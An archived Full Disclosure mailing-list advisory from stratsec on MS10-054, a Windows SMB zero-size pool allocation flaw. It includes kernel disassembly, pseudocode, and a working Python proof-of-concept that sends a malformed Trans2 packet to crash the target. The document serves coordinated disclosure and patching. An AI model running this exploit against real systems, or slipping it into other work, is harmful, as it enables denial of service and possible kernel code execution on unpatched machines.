Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

stratsec Security Advisory: SS-2010-007 Microsoft SMB Server Zero Size Pool Allocation
From: stratsec Advisories <advisories () stratsec net>
Date: Wed, 11 Aug 2010 09:03:19 +1000

===============================================================================
stratsec Security Advisory: SS-2010-007 MS SMB Server Zero Size Pool Allocation
===============================================================================

Title:           SS-2010-007 Microsoft SMB Server Zero Size Pool Allocation
Version:         1.0
Issue type:      Pool Corruption
Affected vendor: Microsoft
Release date:    11/08/2010
Discovered by:   Laurent GaffiƩ
Advisory by:     Laurent GaffiƩ
Issue status:    Patch available

===============================================================================

Summary
-------

A vulnerability in the Windows kernel can be triggered via SMB in Microsoft 
Windows versions ranging from Windows 2000 through to Windows 7.  This 
vulnerability allows an attacker to trigger a kernel pool corruption by sending
a specially crafted SMB_COM_TRANSACTION2 request.Successful exploitation of 
this issue may result in remote code execution with kernel privileges, while
failed attempts will result in a Denial of Service condition.Microsoft has
published a patch to resolve the issue


Technical details
-----------------

The following analysis has been performed on an up-to-date Windows 7 x86-32
system.The issue is triggered by sending a crafted SMB_COM_TRANSACTION2 
request:
- The client connects to a SMB server with at least read privileges on this
share.
- The client constructs a malicious Trans2 "QUERY_FS_INFO Query FS Attribute 
info" with the Max DataCount parameter set to 0. 

During processing of the query, SrvSmbQueryFsInformation() from srv.sys will
call NtQueryVolumeInformationFile(FileFsSizeInformation) from ntoskrnl.exe
NtQueryVolumeInformationFile allocates a pool chunk with a size taken from an
unverified user input:

kd> nt!NtQueryVolumeInformationFile+0x3de:
82a5779c ff7514       push  dword ptr [ebp+14h] ;User controlled
82a5779f 50           push  eax                               
82a577a0 e85d1fe6ff   call  nt!ExAllocatePoolWithQuotaTag (828b9702)
82a577a5 eb23         jmp   nt!NtQueryVolumeInformationFile+0x40c (82a577ca)
kd> 

The actual code of the NtQueryVolumeInformationFile function looks like this:

NTSTATUS
NtQueryVolumeInformationFile(IN HANDLE FileHandle, 
                           OUT PIO_STATUS_BLOCK IoStatusBlock,
                           OUT PVOID FileSystemInformation,
                           IN ULONG Length, 
                           IN FS_INFORMATION_CLASS FileSystemInformationClass)
{

    if (RequestorMode != KernelMode)
    {   
    }

    if (FileSystemInformationClass == FileFsDeviceInformation)
    {
    }

    if (FileSystemInformationClass == FileFsDriverPathInformation)
    {
       PFILE_FS_DRIVER_PATH_INFORMATION Buffer, Source;
       Source = (PFILE_FS_DRIVER_PATH_INFORMATION)FileSystemInformation;
       Buffer = (PFILE_FS_DRIVER_PATH_INFORMATION)ExAllocatePoolWithQuota(NonPagedPool, Length);

        RtlCopyMemory(Buffer, Source, Length);

        NtStatus = IopGetDriverPathInformation(FileObject, Buffer, Length);

        // [...]
        if (Buffer) ExFreePool(Buffer);
    }


// Issue;
//SystemBuffer, which is the buffer used for the I/O, can be allocated with 
//a size of zero because of the lack of length sanity check.
//Later this buffer is used for various operations, which is the source of
//trouble when the I/O Manager tries to release the buffer.

    Irp->AssociatedIrp.SystemBuffer = ExAllocatePoolWithQuota(NonPagedPool,
                                                              Length);
// This buffer is freed later by the Windows I/O Manager.
}



Impact
------

Successful attempts may allow code execution with kernel privileges, failed
attempts will result in a denial of service (B.S.O.D).

Affected products
-----------------

Windows:
- 2000
- XP
- 2003
- Vista
- 2008
- 7
- 2008R2



Proof of concept
----------------

#!/usr/bin/env python
import sys,struct,socket
from socket import *

if len(sys.argv)<=2:
   print '#######################################################################'
   print '#   MS10-054 Proof Of Concept'
   print '#   Usage: python '+sys.argv[0]+' TARGET SHARE-NAME (No backslash)'
   print '#   Example: python '+sys.argv[0]+' 192.168.8.101 users'
   print '#######################################################################\n\n'
   sys.exit()

host = str(sys.argv[1]),445

packetnego =  "\x00\x00\x00\x9a"
packetnego += "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packetnego += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x15\x00\x00\x01\x3d"
packetnego += "\x00\x77\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
packetnego += "\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4d\x49\x43\x52"
packetnego += "\x4f\x53\x4f\x46\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x33"
packetnego += "\x2e\x30\x00\x02\x44\x4f\x53\x20\x4c\x4d\x31\x2e\x32\x58\x30\x30"
packetnego += "\x32\x00\x02\x44\x4f\x53\x20\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31"
packetnego += "\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f"
packetnego += "\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4e"
packetnego += "\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"

def tidpiduidfield(data):
    all_=data[28:34]
    return all_

def handle(data):
    ##Chained SMB commands; Session Setup AndX Request,Tree connect
    if data[8:10] == "\x72\x00":
       sharename = "\x00\x00\x5c\x5c\x5c"+str(sys.argv[2])+"\x00\x3f\x3f\x3f\x3f\x3f\x00"
       packetsession =  "\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
       packetsession += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd5\x15\x01\x00\x81\x2f"
       packetsession += "\x0d\x75\x00\x7a\x00\x68\x0b\x32\x00\x00\x00\x00\x00\x00\x00\x18"
       packetsession += "\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x3d\x00\x01\x01\x01"
       packetsession += "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
       packetsession += "\x01\x01\x01\x01\x01\x59\x4f\x00\x57\x4f\x52\x4b\x47\x52\x4f\x55"
       packetsession += "\x50\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x57\x69"
       packetsession += "\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x04\xff\x00\x00\x00\x00"
       packetsession += "\x00\x01\x00"+struct.pack(">i", len(sharename))[3:4]+sharename
       print "[+]Session Query sent"    
       return struct.pack(">i", len(packetsession))+packetsession

    ##Trans2, Request, QUERY_FS_INFO Query FS Attribute Info
    if data[8:10] == "\x73\x00":
       packetrans = "\x00\x00\x00\x46"
       packetrans += "\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x01\xc8\x00\x00\x00\x00"
       packetrans += "\x00\x00\x00\x00\x00\x00\x00\x00"+tidpiduidfield(data)+"\x13\x00"
       packetrans += "\x0f\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
       packetrans += "\x00\x00\x00\x02\x00\x44\x00\x00\x00\x46\x00\x01\x00\x03\x00\x05"
       packetrans += "\x00\x00\x44\x20\x05\x01"
       print "[+]Malformed Trans2 packet sent\n[+]The target should be down now"
       return packetrans

def run():
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(host)
    s.settimeout(2) 
    s.send(packetnego)
    print "[+]Negotiate Protocol Request sent"
    try:
      while True:
        data = s.recv(1024)
        s.send(handle(data))
    except Exception:
        pass
        s.close()
run()

Solution
--------

Apply appropriate security patches published by Microsoft in advisory MS10-054.
Alternatively, configure a firewall to block SMB communications with untrusted
clients.

Response timeline
-----------------

* 11/02/2010 - Vendor notified
* 11/02/2010 - Vendor acknowledges the advisory
* 16/02/2010 - MSRC confirms issue on Windows 7.
* 26/02/2010 - MSRC provide a DC number and confirm the vulnerability across 
               Windows 2000 to Windows 7. 
* 27/02/2010 - MSRC indicates vulnerability is to be categorised as post-auth
               on all platforms and ask for confirmation.  stratsec responds
               with additional information.
* 11/03/2010 - MSRC confirms issue as a remote unauthenticated code execution
               issue for pre-Windows Vista platforms and upgrades overall 
               bulletin severity to Critical
* 12/03/2010 - MSRC plan to release a patch in June 2010
* 30/04/2010 - MSRC push back the update to August 2010.  stratsec agree on new
               release date.
* 24/07/2010 - MSRC confirm the patch for August.
* 05/08/2010 - MSRC propose to give a vendor statement or review this advisory
* 05/08/2010 - stratsec request the CVE number and advisory link to MSRC, and 
               provide this advisory for review.
* 09/08/2010 - MSRC confirm the technical details of this advisory, and provide
               the CVE and link details.
* 11/08/2010 - This advisory released.


References
----------

* Vendor advisory: http://www.microsoft.com/technet/security/Bulletin/MS10-054.mspx
* CVE item: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2550


===============================================================================

About stratsec
--------------
Stratsec, specialises in providing information security consulting and testing
services for government and commercial clients. Established in 2004, we are
now one of the leading independent information security companies in the
Australasian and SE-Asian region, with offices throughout Australia and in
Singapore and Malaysia. 

For more information, please visit our website at http://www.stratsec.net/ 

===============================================================================
-- 
Message  protected by MailGuard: e-mail anti-virus, anti-spam and content filtering.http://www.mailguard.com.au/mg

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • stratsec Security Advisory: SS-2010-007 Microsoft SMB Server Zero Size Pool Allocation stratsec Advisories (Aug 10)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]